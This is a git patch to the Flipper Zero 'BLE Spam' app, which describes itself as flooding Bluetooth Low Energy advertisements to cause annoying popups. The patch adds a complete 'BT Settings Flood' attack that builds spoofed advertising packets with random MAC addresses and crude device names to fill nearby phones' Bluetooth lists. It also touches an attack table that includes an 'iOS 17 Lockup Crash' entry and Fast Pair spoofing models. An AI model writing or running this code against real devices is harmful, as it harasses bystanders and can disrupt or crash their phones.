From ebda85051c47baad1458d6b43362f47f534c75ab Mon Sep 17 00:00:00 2001 From: MX <10697207+xMasterX@users.noreply.github.com> Date: Sun, 10 Mar 2024 21:55:49 +0300 Subject: [PATCH] upd blespam --- ReadMe.md | 2 +- base_pack/ble_spam/application.fam | 4 +- base_pack/ble_spam/ble_spam.c | 27 +++- base_pack/ble_spam/protocols/_protocols.c | 1 + base_pack/ble_spam/protocols/_protocols.h | 2 + base_pack/ble_spam/protocols/_scenes.h | 1 + base_pack/ble_spam/protocols/fastpair.c | 8 +- base_pack/ble_spam/protocols/nameflood.c | 142 ++++++++++++++++++ base_pack/ble_spam/protocols/nameflood.h | 10 ++ .../ble_spam/protocols/nameflood_scenes.h | 1 + 10 files changed, 189 insertions(+), 9 deletions(-) create mode 100644 base_pack/ble_spam/protocols/nameflood.c create mode 100644 base_pack/ble_spam/protocols/nameflood.h create mode 100644 base_pack/ble_spam/protocols/nameflood_scenes.h diff --git a/ReadMe.md b/ReadMe.md index ac1d1800a4d..484b36a7078 100644 --- a/ReadMe.md +++ b/ReadMe.md @@ -89,7 +89,7 @@ The Flipper and its community wouldn't be as rich as it is without your contribu | Metronome | ![Media Badge] | [by panki27](https://github.com/panki27/Metronome) | | [![UFW Badge]](https://lab.flipper.net/apps/metronome) | | Morse Code | ![Media Badge] | [by wh00hw](https://github.com/wh00hw/MorseCodeFAP) | | [![UFW Badge]](https://lab.flipper.net/apps/morse_code) | | **BadKB** plugin | ![Tools Badge] | [by Willy-JL, ClaraCrazy, XFW contributors](https://github.com/Flipper-XFW/Xtreme-Firmware/tree/dev/applications/main/bad_kb) | BadKB (aka BadUSB via Bluetooth) | ![None Badge] | -| BLE Spam | ![BT Badge] | [by @Willy-JL & @ECTO-1A & @Spooks4576](https://github.com/Flipper-XFW/Xtreme-Firmware/tree/dev/applications/external/ble_spam) | | ![None Badge] | +| BLE Spam | ![BT Badge] | [by @Willy-JL & @ECTO-1A & @Spooks4576](https://github.com/Next-Flip/Momentum-Apps/tree/dev/ble_spam) | | ![None Badge] | ### Games diff --git a/base_pack/ble_spam/application.fam b/base_pack/ble_spam/application.fam index 4ca6ee8090a..10a61806183 100644 --- a/base_pack/ble_spam/application.fam +++ b/base_pack/ble_spam/application.fam @@ -7,8 +7,8 @@ App( fap_icon="ble_spam_10px.png", fap_category="Bluetooth", fap_author="@Willy-JL @ECTO-1A @Spooks4576", - fap_weburl="https://github.com/Flipper-XFW/Xtreme-Apps/tree/dev/ble_spam", - fap_version="5.1", + fap_weburl="https://github.com/Next-Flip/Momentum-Apps/tree/dev/ble_spam", + fap_version="6.0", fap_description="Flood BLE advertisements to cause spammy and annoying popups/notifications", fap_icon_assets="icons", fap_icon_assets_symbol="ble_spam", diff --git a/base_pack/ble_spam/ble_spam.c b/base_pack/ble_spam/ble_spam.c index c02cef08ced..3820836ee7c 100644 --- a/base_pack/ble_spam/ble_spam.c +++ b/base_pack/ble_spam/ble_spam.c @@ -24,6 +24,16 @@ static Attack attacks[] = { .cfg = {}, }, }, + { + .title = "BT Settings Flood", + .text = "Fills available BT devices", + .protocol = &protocol_nameflood, + .payload = + { + .random_mac = true, + .cfg.nameflood = {}, + }, + }, { .title = "iOS 17 Lockup Crash", .text = "Newer iPhones, long range", @@ -219,6 +229,9 @@ static int32_t adv_thread(void* _ctx) { const Protocol* protocol = attacks[state->index].protocol; if(!payload->random_mac) randomize_mac(state); if(state->ctx.led_indicator) start_blink(state); + if(furi_hal_bt_extra_beacon_is_active()) { + furi_check(furi_hal_bt_extra_beacon_stop()); + } while(state->advertising) { if(protocol && payload->mode == PayloadModeBruteforce && @@ -231,7 +244,7 @@ static int32_t adv_thread(void* _ctx) { start_extra_beacon(state); furi_thread_flags_wait(true, FuriFlagWaitAny, delays[state->delay]); - furi_hal_bt_extra_beacon_stop(); + furi_check(furi_hal_bt_extra_beacon_stop()); } if(state->ctx.led_indicator) stop_blink(state); @@ -387,10 +400,10 @@ static void draw_callback(Canvas* canvas, void* _ctx) { 48, AlignLeft, AlignTop, - "App+Spam: \e#WillyJL\e# XFW\n" + "App+Spam: \e#WillyJL\e#\n" "Apple+Crash: \e#ECTO-1A\e#\n" "Android+Win: \e#Spooks4576\e#\n" - " Version \e#5.1\e#", + " Version \e#" FAP_VERSION "\e#", false); break; default: { @@ -481,12 +494,14 @@ static bool input_callback(InputEvent* input, void* _ctx) { consumed = true; state->lock_warning = true; if(state->lock_count == 0) { + furi_timer_set_thread_priority(FuriTimerThreadPriorityElevated); furi_timer_start(state->lock_timer, 1000); } if(input->type == InputTypeShort && input->key == InputKeyBack) { state->lock_count++; } if(state->lock_count >= 3) { + furi_timer_set_thread_priority(FuriTimerThreadPriorityElevated); furi_timer_start(state->lock_timer, 1); } } else if( @@ -552,13 +567,16 @@ static bool input_callback(InputEvent* input, void* _ctx) { if(!advertising) { Payload* payload = &attacks[state->index].payload; if(input->type == InputTypeLong && !payload->random_mac) randomize_mac(state); + if(furi_hal_bt_extra_beacon_is_active()) { + furi_check(furi_hal_bt_extra_beacon_stop()); + } start_extra_beacon(state); if(state->ctx.led_indicator) notification_message(state->ctx.notification, &solid_message); furi_delay_ms(10); - furi_hal_bt_extra_beacon_stop(); + furi_check(furi_hal_bt_extra_beacon_stop()); if(state->ctx.led_indicator) notification_message_block(state->ctx.notification, &sequence_reset_rgb); @@ -604,6 +622,7 @@ static void lock_timer_callback(void* _ctx) { with_view_model( state->main_view, State * *model, { (*model)->lock_warning = false; }, true); state->lock_count = 0; + furi_timer_set_thread_priority(FuriTimerThreadPriorityNormal); } static void tick_event_callback(void* _ctx) { diff --git a/base_pack/ble_spam/protocols/_protocols.c b/base_pack/ble_spam/protocols/_protocols.c index bd3257025a1..5a4c21a79bd 100644 --- a/base_pack/ble_spam/protocols/_protocols.c +++ b/base_pack/ble_spam/protocols/_protocols.c @@ -5,6 +5,7 @@ const Protocol* protocols[] = { &protocol_easysetup, &protocol_fastpair, &protocol_lovespouse, + &protocol_nameflood, &protocol_swiftpair, }; diff --git a/base_pack/ble_spam/protocols/_protocols.h b/base_pack/ble_spam/protocols/_protocols.h index b46cd5fcb82..c275f20096b 100644 --- a/base_pack/ble_spam/protocols/_protocols.h +++ b/base_pack/ble_spam/protocols/_protocols.h @@ -4,6 +4,7 @@ #include "easysetup.h" #include "fastpair.h" #include "lovespouse.h" +#include "nameflood.h" #include "swiftpair.h" typedef enum { @@ -25,6 +26,7 @@ struct Payload { EasysetupCfg easysetup; FastpairCfg fastpair; LovespouseCfg lovespouse; + NamefloodCfg nameflood; SwiftpairCfg swiftpair; } cfg; }; diff --git a/base_pack/ble_spam/protocols/_scenes.h b/base_pack/ble_spam/protocols/_scenes.h index 4c379dd355c..d2aedfa5aa7 100644 --- a/base_pack/ble_spam/protocols/_scenes.h +++ b/base_pack/ble_spam/protocols/_scenes.h @@ -2,4 +2,5 @@ #include "easysetup_scenes.h" #include "fastpair_scenes.h" #include "lovespouse_scenes.h" +#include "nameflood_scenes.h" #include "swiftpair_scenes.h" diff --git a/base_pack/ble_spam/protocols/fastpair.c b/base_pack/ble_spam/protocols/fastpair.c index b79f8454b36..2aba0654a05 100644 --- a/base_pack/ble_spam/protocols/fastpair.c +++ b/base_pack/ble_spam/protocols/fastpair.c @@ -3,6 +3,7 @@ // Hacked together by @Willy-JL and @Spooks4576 // Documentation at https://developers.google.com/nearby/fast-pair/specifications/introduction +// https://bluetoothdb.com static const struct { uint32_t value; @@ -538,8 +539,6 @@ static const struct { {0x87B25F, "Animated Rickroll"}, {0xF38C02, "Boykisser"}, {0x1448C9, "BLM"}, - {0xD5AB33, "Xtreme"}, - {0x0C0B67, "Xtreme Cta"}, {0x13B39D, "Talking Sasquach"}, {0xAA1FE1, "ClownMaster"}, {0x7C6CDB, "Obama"}, @@ -600,6 +599,7 @@ enum { _ConfigExtraStart = ConfigExtraStart, ConfigModel, ConfigInfoRequire, + ConfigInfoPatched, ConfigCOUNT, }; static void config_callback(void* _ctx, uint32_t index) { @@ -611,6 +611,8 @@ static void config_callback(void* _ctx, uint32_t index) { break; case ConfigInfoRequire: break; + case ConfigInfoPatched: + break; default: ctx->fallback_config_enter(ctx, index); break; @@ -698,6 +700,8 @@ static void extra_config(Ctx* ctx) { variable_item_list_add(list, "Requires Google services", 0, NULL, NULL); + variable_item_list_add(list, "Patched on new Android", 0, NULL, NULL); + variable_item_list_set_enter_callback(list, config_callback, ctx); } diff --git a/base_pack/ble_spam/protocols/nameflood.c b/base_pack/ble_spam/protocols/nameflood.c new file mode 100644 index 00000000000..4d517bbce70 --- /dev/null +++ b/base_pack/ble_spam/protocols/nameflood.c @@ -0,0 +1,142 @@ +#include "nameflood.h" +#include "_protocols.h" + +// Hacked together by @Willy-JL + +static const char* names[] = { + "Assquach💦", + "Flipper 🐬", + "iOS 17 🍎", + "Kink💦", + "👉👌", + "🔵🦷", +}; +static const uint8_t names_count = COUNT_OF(names); + +static const char* get_name(const Payload* payload) { + UNUSED(payload); + return "NameFlood"; +} + +static void make_packet(uint8_t* _size, uint8_t** _packet, Payload* payload) { + NamefloodCfg* cfg = payload ? &payload->cfg.nameflood : NULL; + + const char* name; + switch(cfg ? payload->mode : PayloadModeRandom) { + case PayloadModeRandom: + default: + name = names[rand() % names_count]; + break; + case PayloadModeValue: + name = cfg->name; + break; + } + uint8_t name_len = strlen(name); + + uint8_t size = 12 + name_len; + uint8_t* packet = malloc(size); + uint8_t i = 0; + + packet[i++] = 2; // Size + packet[i++] = 0x01; // AD Type (Flags) + packet[i++] = 0x06; // Flags + + packet[i++] = name_len + 1; // Size + packet[i++] = 0x09; // AD Type (Complete Local Name) + memcpy(&packet[i], name, name_len); // Device Name + i += name_len; + + packet[i++] = 3; // Size + packet[i++] = 0x02; // AD Type (Incomplete Service UUID List) + packet[i++] = 0x12; // Service UUID (Human Interface Device) + packet[i++] = 0x18; // ... + + packet[i++] = 2; // Size + packet[i++] = 0x0A; // AD Type (Tx Power Level) + packet[i++] = 0x00; // 0dBm + + *_size = size; + *_packet = packet; +} + +enum { + _ConfigExtraStart = ConfigExtraStart, + ConfigName, + ConfigInfoSettings, + ConfigCOUNT, +}; +static void config_callback(void* _ctx, uint32_t index) { + Ctx* ctx = _ctx; + scene_manager_set_scene_state(ctx->scene_manager, SceneConfig, index); + switch(index) { + case ConfigName: + scene_manager_next_scene(ctx->scene_manager, SceneNamefloodName); + break; + case ConfigInfoSettings: + break; + default: + ctx->fallback_config_enter(ctx, index); + break; + } +} +static void extra_config(Ctx* ctx) { + Payload* payload = &ctx->attack->payload; + NamefloodCfg* cfg = &payload->cfg.nameflood; + VariableItemList* list = ctx->variable_item_list; + VariableItem* item; + + item = variable_item_list_add(list, "Display Name", 0, NULL, NULL); + variable_item_set_current_value_text( + item, payload->mode == PayloadModeRandom ? "Random" : cfg->name); + + variable_item_list_add(list, "See in phone BT settings", 0, NULL, NULL); + + variable_item_list_set_enter_callback(list, config_callback, ctx); +} + +static uint8_t config_count(const Payload* payload) { + UNUSED(payload); + return ConfigCOUNT - ConfigExtraStart - 1; +} + +const Protocol protocol_nameflood = { + .icon = &I_ble_spam, + .get_name = get_name, + .make_packet = make_packet, + .extra_config = extra_config, + .config_count = config_count, +}; + +static void name_callback(void* _ctx) { + Ctx* ctx = _ctx; + Payload* payload = &ctx->attack->payload; + payload->mode = PayloadModeValue; + scene_manager_previous_scene(ctx->scene_manager); +} +void scene_nameflood_name_on_enter(void* _ctx) { + Ctx* ctx = _ctx; + Payload* payload = &ctx->attack->payload; + NamefloodCfg* cfg = &payload->cfg.nameflood; + TextInput* text_input = ctx->text_input; + + text_input_set_header_text(text_input, "Press back for random"); + + text_input_set_result_callback( + text_input, name_callback, ctx, cfg->name, sizeof(cfg->name), true); + + text_input_set_minimum_length(text_input, 0); + + view_dispatcher_switch_to_view(ctx->view_dispatcher, ViewTextInput); +} +bool scene_nameflood_name_on_event(void* _ctx, SceneManagerEvent event) { + Ctx* ctx = _ctx; + Payload* payload = &ctx->attack->payload; + if(event.type == SceneManagerEventTypeBack) { + payload->mode = PayloadModeRandom; + } + return false; +} +void scene_nameflood_name_on_exit(void* _ctx) { + Ctx* ctx = _ctx; + text_input_reset(ctx->text_input); +} diff --git a/base_pack/ble_spam/protocols/nameflood.h b/base_pack/ble_spam/protocols/nameflood.h new file mode 100644 index 00000000000..a6c3c78d5f0 --- /dev/null +++ b/base_pack/ble_spam/protocols/nameflood.h @@ -0,0 +1,10 @@ +#pragma once +#include "_base.h" + +// Hacked together by @Willy-JL + +typedef struct { + char name[20]; +} NamefloodCfg; + +extern const Protocol protocol_nameflood; diff --git a/base_pack/ble_spam/protocols/nameflood_scenes.h b/base_pack/ble_spam/protocols/nameflood_scenes.h new file mode 100644 index 00000000000..6dc4375fc5e --- /dev/null +++ b/base_pack/ble_spam/protocols/nameflood_scenes.h @@ -0,0 +1 @@ +ADD_SCENE(nameflood_name, NamefloodName)